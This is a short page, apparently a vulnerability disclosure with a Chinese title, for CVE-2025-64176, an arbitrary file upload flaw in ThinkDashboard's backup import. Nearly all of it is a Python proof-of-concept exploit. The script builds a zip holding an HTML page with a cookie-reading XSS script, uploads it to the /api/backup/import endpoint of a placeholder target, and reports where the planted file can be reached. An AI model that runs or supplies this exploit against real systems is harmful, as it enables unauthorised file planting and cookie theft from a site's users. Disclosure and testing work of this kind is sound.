CVE-2025-64176 ThinkDashboard备份导入任意文件上传漏洞

#!/usr/bin/env python3 """ CVE-2025-64176 PoC - ThinkDashboard Arbitrary File Upload via Backup Import This PoC demonstrates how to bypass client-side file type validation and upload arbitrary files to the /data directory. """ import zipfile import io import requests TARGET_URL = "http://target.com" # Replace with actual target URL BACKUP_UPLOAD_ENDPOINT = f"{TARGET_URL}/api/backup/import" def create_malicious_zip(): """Create a zip file containing malicious content""" zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: # Create a file with malicious XSS payload malicious_html = '''<!DOCTYPE html> <html> <head><title>XSS</title></head> <body> <script>alert(document.cookie)</script> </body> </html>''' zip_file.writestr("malicious.html", malicious_html) # Add other potentially dangerous files zip_file.writestr("payload.js", "// malicious javascript") zip_buffer.seek(0) return zip_buffer.getvalue() def exploit(): """Exploit the arbitrary file upload vulnerability""" print("[*] Creating malicious zip file...") zip_content = create_malicious_zip() print(f"[*] Target: {TARGET_URL}") print("[*] Uploading malicious backup file...") files = { 'backup': ('backup.zip', zip_content, 'application/zip') } try: response = requests.post(BACKUP_UPLOAD_ENDPOINT, files=files, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] File uploaded successfully!") print("[+] Access the uploaded file at: /data/malicious.html") else: print("[-] Upload failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit()